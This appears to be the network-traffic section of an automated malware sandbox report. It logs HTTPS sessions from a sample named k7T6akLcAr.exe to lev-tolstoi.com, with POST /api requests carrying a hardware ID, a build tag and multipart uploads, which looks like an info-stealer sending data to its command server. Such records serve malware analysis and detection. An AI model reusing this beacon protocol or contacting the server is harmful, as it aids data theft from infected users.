                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f402c23efa9-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1988&rtt_var=749&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1457085&cwnd=151&unsent_bytes=0&cid=0faf086e2d5c0a81&ts=775&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:42 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                                                      2024-12-28 08:40:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      2192.168.2.649712172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 53
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:44 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=cno6c2r3ac2lajh6gjh8frdv0a; expires=Wed, 23 Apr 2025 02:27:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Vgi0oQJR5tNXHd8mSIH9fdtDt79rAIWItgK3qydiQzzE2niYcFXRqSqXbkpowRhKNP5xkYrLb48nxtyLBJlKjGdbXF4IdpISMXNv96APIM8BE3pB%2BdyPGJ%2BVgfB0OvS5sA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f4d0f9d43fd-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1609&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1713615&cwnd=217&unsent_bytes=0&cid=c39e0ea8beee5c94&ts=768&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC248INData Raw: 33 64 65 37 0d 0a 49 75 2b 6d 36 38 75 4f 7a 52 31 4c 71 6b 43 63 35 67 4e 54 65 71 54 38 6a 46 65 57 58 32 6a 79 4f 49 6c 6a 43 53 6f 63 61 4f 64 5a 7a 64 44 4a 38 62 72 68 50 7a 6a 50 59 71 61 53 63 53 59 66 69 4e 37 74 4d 37 52 6c 44 70 4e 55 2b 67 59 6c 43 47 6f 46 78 52 69 4a 78 34 65 34 36 2b 45 2f 4c 74 4a 69 70 72 31 34 63 52 2f 4b 33 72 5a 31 38 7a 55 4b 6b 31 54 72 41 6d 4a 46 62 41 53 45 53 6f 50 42 67 36 37 74 71 58 77 6e 78 79 58 35 67 32 49 35 46 4d 32 52 35 44 71 30 63 30 71 58 51 71 74 5a 4b 32 64 35 48 49 5a 76 6a 74 57 41 36 66 50 68 5a 6d 6e 50 4c 72 37 63 49 54 49 66 78 70 44 71 4d 2f 30 33 41 4a 70 63 36 67 64 6a 57 6e 55 4f 6a 30 71 4e 77 6f 4b 6b 35 4c 31 78 4c 63 41 75 2f 34 6c 69 63 56 61 47 6d 66 5a 31 72 48
                                                                                                                                                                                                                                                                      Data Ascii: 3de7Iu+m68uOzR1LqkCc5gNTeqT8jFeWX2jyOIljCSocaOdZzdDJ8brhPzjPYqaScSYfiN7tM7RlDpNU+gYlCGoFxRiJx4e46+E/LtJipr14cR/K3rZ18zUKk1TrAmJFbASESoPBg67tqXwnxyX5g2I5FM2R5Dq0c0qXQqtZK2d5HIZvjtWA6fPhZmnPLr7cITIfxpDqM/03AJpc6gdjWnUOj0qNwoKk5L1xLcAu/4licVaGmfZ1rH
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 31 5a 6f 6c 6e 36 45 48 35 46 62 67 7a 46 58 38 50 64 79 61 37 67 37 79 64 70 77 43 37 77 67 57 49 2b 48 38 65 65 2f 44 72 30 50 67 4b 59 58 75 45 4f 5a 45 64 77 41 49 4a 49 68 4d 4f 47 72 75 53 70 63 43 71 49 62 4c 36 44 65 58 46 41 68 72 37 2b 4e 76 63 70 42 34 45 61 39 45 39 79 43 48 6b 47 78 52 6a 4e 77 6f 65 6f 34 61 39 74 49 63 4d 70 2b 35 5a 71 4f 42 58 4c 6e 75 4d 2f 2b 7a 34 4b 6c 31 44 68 44 6d 46 4d 63 77 65 44 51 49 32 45 78 2b 6e 72 74 7a 39 78 69 41 48 37 6c 47 59 39 44 6f 53 6b 72 69 71 36 4a 45 71 58 56 71 74 5a 4b 30 42 37 43 59 5a 4c 67 73 65 42 6f 76 36 76 62 53 2f 46 4a 2b 79 43 5a 44 38 53 78 59 7a 6b 4f 2f 49 2b 41 35 74 54 37 67 5a 76 43 44 42 4b 67 6c 6a 4e 6e 4d 6d 49 34 61 52 7a 49 39 38 69 76 70 73 76 4b 46 6a 42 6b 71 35 74 74
                                                                                                                                                                                                                                                                      Data Ascii: 1Zoln6EH5FbgzFX8Pdya7g7ydpwC7wgWI+H8ee/Dr0PgKYXuEOZEdwAIJIhMOGruSpcCqIbL6DeXFAhr7+NvcpB4Ea9E9yCHkGxRjNwoeo4a9tIcMp+5ZqOBXLnuM/+z4Kl1DhDmFMcweDQI2Ex+nrtz9xiAH7lGY9DoSkriq6JEqXVqtZK0B7CYZLgseBov6vbS/FJ+yCZD8SxYzkO/I+A5tT7gZvCDBKgljNnMmI4aRzI98ivpsvKFjBkq5tt
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 61 70 55 46 73 55 44 35 53 78 57 71 4f 30 49 71 6a 72 70 70 38 4a 38 59 6c 36 4d 52 2b 66 77 47 47 6d 65 4a 31 72 48 30 48 6b 56 4c 74 45 32 52 46 66 51 53 4c 54 34 6a 4c 67 61 6e 73 6f 6e 6f 74 77 79 6e 39 69 57 55 6a 45 73 61 57 36 7a 54 2b 4e 30 72 65 47 75 77 5a 4b 78 41 2b 4f 35 4a 4c 7a 2f 47 4b 70 2b 4b 6f 61 57 6e 58 62 4f 66 45 5a 6a 31 59 6e 74 37 6a 50 66 45 34 42 5a 46 51 35 51 52 68 52 48 59 45 68 6c 4b 43 77 49 6d 6c 35 4b 56 79 4a 38 77 71 39 34 39 71 4e 78 6a 48 6c 4b 35 37 74 44 6f 53 30 41 4b 72 4e 57 78 45 63 77 58 48 64 59 37 4b 68 36 37 36 37 32 42 6e 30 57 4c 35 69 43 46 70 57 4d 71 58 37 6a 37 2b 4f 51 71 58 56 2b 34 43 62 45 74 7a 44 59 39 4f 69 73 43 46 6f 4f 47 70 66 79 37 4d 4a 2b 79 42 61 44 30 55 68 74 43 75 4d 75 78 39 55 74
                                                                                                                                                                                                                                                                      Data Ascii: apUFsUD5SxWqO0Iqjrpp8J8Yl6MR+fwGGmeJ1rH0HkVLtE2RFfQSLT4jLgansonotwyn9iWUjEsaW6zT+N0reGuwZKxA+O5JLz/GKp+KoaWnXbOfEZj1Ynt7jPfE4BZFQ5QRhRHYEhlKCwIml5KVyJ8wq949qNxjHlK57tDoS0AKrNWxEcwXHdY7Kh67672Bn0WL5iCFpWMqX7j7+OQqXV+4CbEtzDY9OisCFoOGpfy7MJ+yBaD0UhtCuMux9Ut
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 4b 78 41 2b 41 34 78 53 67 38 71 41 70 4f 71 6e 65 43 66 46 4b 66 69 50 5a 6a 59 65 79 35 62 6a 4d 50 63 38 44 70 70 49 36 41 70 68 52 58 52 4b 79 77 43 4b 33 4d 6e 78 72 49 68 7a 41 4e 67 35 37 4a 49 68 4c 6c 62 66 33 75 6b 35 74 47 56 4b 6b 31 58 69 44 6d 4e 41 63 51 57 42 54 6f 76 43 68 4b 7a 6a 70 57 30 68 78 69 2f 31 69 32 6f 6a 47 4d 75 61 34 6a 48 38 4e 67 44 51 46 4b 73 47 63 77 67 6d 53 72 42 4e 67 73 53 4b 76 36 79 77 4d 54 43 49 4a 66 4c 45 4f 58 45 55 79 4a 37 68 4f 66 67 32 41 70 46 57 35 51 5a 75 51 58 59 43 6c 30 47 4a 7a 49 69 6e 34 36 35 37 4c 4d 30 6d 2b 59 42 6e 50 6c 69 49 33 75 6b 74 74 47 56 4b 76 33 33 65 51 30 70 79 50 68 58 4c 57 63 33 44 68 65 6d 30 37 33 4d 71 78 43 72 78 67 6d 67 39 45 73 2b 56 34 6a 37 77 4d 51 4f 56 58 4f 6f
                                                                                                                                                                                                                                                                      Data Ascii: KxA+A4xSg8qApOqneCfFKfiPZjYey5bjMPc8DppI6AphRXRKywCK3MnxrIhzANg57JIhLlbf3uk5tGVKk1XiDmNAcQWBTovChKzjpW0hxi/1i2ojGMua4jH8NgDQFKsGcwgmSrBNgsSKv6ywMTCIJfLEOXEUyJ7hOfg2ApFW5QZuQXYCl0GJzIin4657LM0m+YBnPliI3ukttGVKv33eQ0pyPhXLWc3Dhem073MqxCrxgmg9Es+V4j7wMQOVXOo
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 41 32 4d 55 6f 50 4a 68 71 48 6b 70 6e 34 74 7a 53 2f 34 69 47 73 77 48 38 69 51 35 6e 57 36 66 51 32 49 47 72 4e 42 53 6c 68 6c 47 4a 4e 4e 72 4d 6d 47 36 66 50 68 5a 6d 6e 50 4c 72 37 63 49 54 67 4b 77 70 50 38 50 50 4d 7a 42 5a 4e 49 36 67 78 67 57 6e 6b 46 67 55 65 42 77 6f 61 76 37 61 70 31 4a 63 38 6e 39 59 74 74 63 56 61 47 6d 66 5a 31 72 48 30 6b 6d 30 6e 38 41 6d 56 44 61 42 48 46 58 38 50 64 79 61 37 67 37 79 64 70 79 79 6e 31 67 47 45 39 47 4d 4b 54 37 69 66 37 4f 67 32 5a 55 66 6b 4c 62 45 39 31 41 6f 35 50 69 39 61 46 70 2f 36 71 62 54 75 49 62 4c 36 44 65 58 46 41 68 71 6a 70 4a 65 51 2b 53 4b 46 4d 36 42 64 67 52 58 4a 4b 6d 67 36 55 68 49 36 6c 72 50 63 2f 4c 38 63 72 2f 59 74 67 4f 42 54 4c 6d 2b 63 77 39 54 73 4f 6d 6c 44 72 42 32 31 4a
                                                                                                                                                                                                                                                                      Data Ascii: A2MUoPJhqHkpn4tzS/4iGswH8iQ5nW6fQ2IGrNBSlhlGJNNrMmG6fPhZmnPLr7cITgKwpP8PPMzBZNI6gxgWnkFgUeBwoav7ap1Jc8n9YttcVaGmfZ1rH0km0n8AmVDaBHFX8Pdya7g7ydpyyn1gGE9GMKT7if7Og2ZUfkLbE91Ao5Pi9aFp/6qbTuIbL6DeXFAhqjpJeQ+SKFM6BdgRXJKmg6UhI6lrPc/L8cr/YtgOBTLm+cw9TsOmlDrB21J
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 43 4b 79 4d 6e 78 72 4b 78 34 4b 73 6b 6f 39 34 68 75 4e 68 7a 55 6c 4f 6b 6e 39 54 77 42 6e 56 62 72 44 47 5a 43 66 77 4f 49 54 49 44 44 6a 71 62 70 37 7a 46 70 7a 7a 71 2b 33 43 45 51 46 63 32 53 74 57 2b 30 49 6b 53 4a 47 75 77 4e 4b 78 41 2b 43 6f 39 46 68 38 6d 4b 70 75 2b 39 66 69 2f 61 49 76 4f 4f 63 7a 73 54 77 35 50 6a 4f 50 63 37 44 4a 74 57 2b 51 68 72 53 33 56 4b 79 77 43 4b 33 4d 6e 78 72 49 78 6f 50 38 49 6c 38 70 4a 71 4d 42 76 51 6b 2f 35 31 75 6e 30 62 6c 30 75 72 57 58 31 59 61 51 32 61 44 70 53 45 6a 71 57 73 39 7a 38 76 77 53 54 35 67 6d 38 6a 48 63 43 52 34 54 7a 39 4f 51 4b 54 57 75 38 46 62 45 31 39 42 6f 35 48 6a 73 75 4e 6f 4f 4b 6d 63 47 6d 47 59 76 6d 63 49 57 6c 59 35 34 58 74 4f 66 6c 39 46 64 35 44 71 77 5a 6e 43 43 5a 4b 69
                                                                                                                                                                                                                                                                      Data Ascii: CKyMnxrKx4Ksko94huNhzUlOkn9TwBnVbrDGZCfwOITIDDjqbp7zFpzzq+3CEQFc2StW+0IkSJGuwNKxA+Co9Fh8mKpu+9fi/aIvOOczsTw5PjOPc7DJtW+QhrS3VKywCK3MnxrIxoP8Il8pJqMBvQk/51un0bl0urWX1YaQ2aDpSEjqWs9z8vwST5gm8jHcCR4Tz9OQKTWu8FbE19Bo5HjsuNoOKmcGmGYvmcIWlY54XtOfl9Fd5DqwZnCCZKi
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 43 76 2b 6d 6f 61 57 76 39 49 66 43 4b 5a 69 64 59 32 61 47 67 64 66 73 6e 53 73 68 6a 38 6b 46 73 52 44 35 53 78 56 57 4b 78 49 36 7a 2b 71 68 7a 4f 4d 4d 76 38 71 5a 75 4e 67 37 46 6b 65 30 6b 2f 58 45 42 6e 52 71 6c 51 57 78 51 50 6c 4c 46 62 34 72 53 69 6f 62 76 76 6e 5a 70 68 6d 4c 35 6b 69 46 70 57 50 6a 65 2f 44 62 6b 50 67 57 42 5a 4b 74 5a 63 6e 59 2b 41 5a 4e 48 6e 63 65 66 6f 75 47 6a 62 68 65 49 65 71 72 57 4d 32 4e 4b 6c 49 47 75 4b 73 74 7a 53 70 45 61 73 7a 68 79 43 47 68 4b 33 52 4c 44 68 4a 76 70 74 4f 38 34 4b 74 6f 77 2b 49 64 33 4d 6c 2f 34 6f 4d 6b 6a 2f 6a 6f 61 6c 30 33 6b 51 53 55 49 63 55 72 64 65 63 33 4e 6a 72 4c 39 75 58 49 35 7a 32 4c 42 79 69 45 70 57 4a 37 65 32 7a 62 36 4d 77 32 47 53 36 59 6d 66 55 4a 35 47 6f 4a 58 67 6f
                                                                                                                                                                                                                                                                      Data Ascii: Cv+moaWv9IfCKZidY2aGgdfsnSshj8kFsRD5SxVWKxI6z+qhzOMMv8qZuNg7Fke0k/XEBnRqlQWxQPlLFb4rSiobvvnZphmL5kiFpWPje/DbkPgWBZKtZcnY+AZNHncefouGjbheIeqrWM2NKlIGuKstzSpEaszhyCGhK3RLDhJvptO84Ktow+Id3Ml/4oMkj/joal03kQSUIcUrdec3NjrL9uXI5z2LByiEpWJ7e2zb6Mw2GS6YmfUJ5GoJXgo
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 70 48 38 75 32 44 54 6c 79 47 6b 79 41 74 79 67 30 42 37 34 4f 77 32 4b 58 65 30 6e 53 77 67 77 53 6f 6f 41 31 66 33 4a 34 61 79 51 4d 57 6e 51 59 71 62 45 56 44 49 57 79 4a 6e 34 4a 4c 6b 56 4b 61 70 67 71 53 31 73 58 54 77 2b 67 6c 43 63 7a 34 53 6c 72 4f 45 2f 4c 34 68 36 72 73 6f 68 4e 51 6d 47 78 72 35 6e 72 32 68 5a 78 77 71 35 48 69 56 52 50 68 7a 46 47 4e 2b 4b 79 62 75 73 39 7a 39 75 79 7a 44 73 67 6d 49 6e 47 34 47 67 30 42 4c 36 4f 67 75 47 53 76 77 4f 56 58 5a 72 43 59 74 4f 69 74 4b 59 36 61 4c 76 63 47 6d 51 47 37 37 4d 49 51 35 57 68 6f 61 75 62 62 51 49 43 5a 35 55 37 42 64 36 42 56 6b 45 67 6b 47 62 31 4a 36 6d 72 4f 45 2f 4c 34 68 36 72 4d 6f 68 4e 51 6d 47 78 72 35 6e 72 32 68 5a 78 77 71 35 48 69 56 52 50 68 7a 46 47 4e 2b 4b 79 62 75
                                                                                                                                                                                                                                                                      Data Ascii: pH8u2DTlyGkyAtyg0B74Ow2KXe0nSwgwSooA1f3J4ayQMWnQYqbEVDIWyJn4JLkVKapgqS1sXTw+glCcz4SlrOE/L4h6rsohNQmGxr5nr2hZxwq5HiVRPhzFGN+Kybus9z9uyzDsgmInG4Gg0BL6OguGSvwOVXZrCYtOitKY6aLvcGmQG77MIQ5WhoaubbQICZ5U7Bd6BVkEgkGb1J6mrOE/L4h6rMohNQmGxr5nr2hZxwq5HiVRPhzFGN+Kybu
                                                                                                                                                                                                                                                                      2024-12-28 08:40:44 UTC1369INData Raw: 74 34 68 76 73 6f 68 50 56 69 65 33 75 38 2f 35 44 41 46 6c 78 62 73 47 32 77 49 4d 45 71 4c 41 4e 57 45 69 4b 50 38 6f 6e 41 75 68 43 54 77 69 69 45 75 56 74 2f 65 2b 48 57 73 62 6b 54 51 53 4b 74 5a 4b 77 39 39 47 4a 64 47 6a 74 4b 4b 37 74 4b 52 55 6a 76 50 4d 76 33 47 55 44 77 63 30 49 76 74 4a 66 4d 44 4e 4c 31 49 37 42 46 6f 43 6b 38 63 68 6b 43 44 77 38 6e 6e 72 4c 63 2f 63 59 67 50 37 49 4e 78 4d 6c 69 49 33 75 4a 31 72 48 30 48 67 6c 33 37 41 69 64 50 5a 41 33 46 58 38 50 64 79 62 2b 73 39 79 78 6e 69 44 43 2b 33 43 46 32 46 73 75 66 37 54 76 33 4c 78 69 57 57 66 30 43 4c 48 5a 41 4a 35 64 48 6e 63 66 4c 6d 4f 47 72 61 54 7a 4c 4d 76 6d 36 58 78 77 4b 77 59 37 74 64 39 67 36 42 35 78 6b 31 54 5a 36 54 32 35 49 6f 30 4f 62 78 38 6e 6e 72 4c 63 2f
                                                                                                                                                                                                                                                                      Data Ascii: t4hvsohPVie3u8/5DAFlxbsG2wIMEqLANWEiKP8onAuhCTwiiEuVt/e+HWsbkTQSKtZKw99GJdGjtKK7tKRUjvPMv3GUDwc0IvtJfMDNL1I7BFoCk8chkCDw8nnrLc/cYgP7INxMliI3uJ1rH0Hgl37AidPZA3FX8Pdyb+s9yxniDC+3CF2Fsuf7Tv3LxiWWf0CLHZAJ5dHncfLmOGraTzLMvm6XxwKwY7td9g6B5xk1TZ6T25Io0Obx8nnrLc/


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      3192.168.2.649718172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:46 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=5A1OQ2ITZ8JFW4J4U7
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 12865
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:46 UTC12865OUTData Raw: 2d 2d 35 41 31 4f 51 32 49 54 5a 38 4a 46 57 34 4a 34 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 35 41 31 4f 51 32 49 54 5a 38 4a 46 57 34 4a 34 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 41 31 4f 51 32 49 54 5a 38 4a 46 57 34 4a 34 55 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                                                                                                      Data Ascii: --5A1OQ2ITZ8JFW4J4U7Content-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--5A1OQ2ITZ8JFW4J4U7Content-Disposition: form-data; name="pid"2--5A1OQ2ITZ8JFW4J4U7Content-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                                                                                                      2024-12-28 08:40:47 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:47 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=317hs11ek3mlbkij38ctgotc7p; expires=Wed, 23 Apr 2025 02:27:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzmBZIHe%2F%2Bu9bTExB9nCtLAc6nx7TDP%2F36IEYnEwiwb6W4rqYsbXFj4CMWvmZaDvkNYevpXpRXeYBKrR3gLhCTH6yvtOWvEN%2Bq1nBdnXj0DI8nAxdvDiPKtY3%2FaT4eWhqJY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f5b0a89423e-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2211&min_rtt=2211&rtt_var=829&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13804&delivery_rate=1319475&cwnd=197&unsent_bytes=0&cid=c09a1e2a7aeda8a7&ts=1006&x=0"
                                                                                                                                                                                                                                                                      2024-12-28 08:40:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                      2024-12-28 08:40:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      4192.168.2.649724172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:48 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=HKGKVS9P
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 15051
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:48 UTC15051OUTData Raw: 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 37 31 42 42 30 39 43 43 36 33 46 31 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 4b 47 4b 56 53 39 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                                                                                                      Data Ascii: --HKGKVS9PContent-Disposition: form-data; name="hwid"1C71BB09CC63F12BBEBA0C6A975F1733--HKGKVS9PContent-Disposition: form-data; name="pid"2--HKGKVS9PContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HKGKVS9PContent-Di
                                                                                                                                                                                                                                                                      2024-12-28 08:40:49 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:49 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=aet8vm2jpe3kujr0e198nec9kv; expires=Wed, 23 Apr 2025 02:27:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEUKn9nVBS%2FnPIPQnQgSLOd8LX%2BVm93eu5nbNLtrsR5i3OBfzFiCXUM%2B4UGrlAU5fO1XB1RTLihnfHGsjpQssMKze3wiM5GYRMl5o5tqmoQ1RwGCtNQ%2Bh6dxGSwVQ6Qzt5k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                      CF-RAY: 8f903f69dfde8c0c-EWR
                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
